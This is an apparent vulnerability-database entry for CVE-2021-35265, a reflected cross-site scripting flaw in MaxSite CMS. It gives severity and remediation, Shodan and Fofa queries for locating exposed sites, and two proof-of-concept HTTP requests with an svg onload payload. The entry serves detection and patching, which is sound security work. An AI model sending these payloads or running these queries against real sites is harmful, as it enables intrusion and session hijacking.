🔙 목록으로 돌아가기

CVE-2021-35265: MaxSite CMS > V106 - Cross-Site Scripting

TitleMaxSite CMS > V106 - Cross-Site Scripting
Authorpikpikcu
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265).
CVSS Score6.1
EPSS Score0.05313
CVE IDCVE-2021-35265
CWE IDCWE-79
Shodan Queryhtml:'content="MaxSite CMS'http.html:'content="maxsite cms'
Fofa Querybody='content="maxsite cms'
Tags cve2021 cve maxsite xss vuln

🔍 Vulnerability Description

A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.”

🌐 HTTP Request

GET /page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /page/1%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-35265.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-35265.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A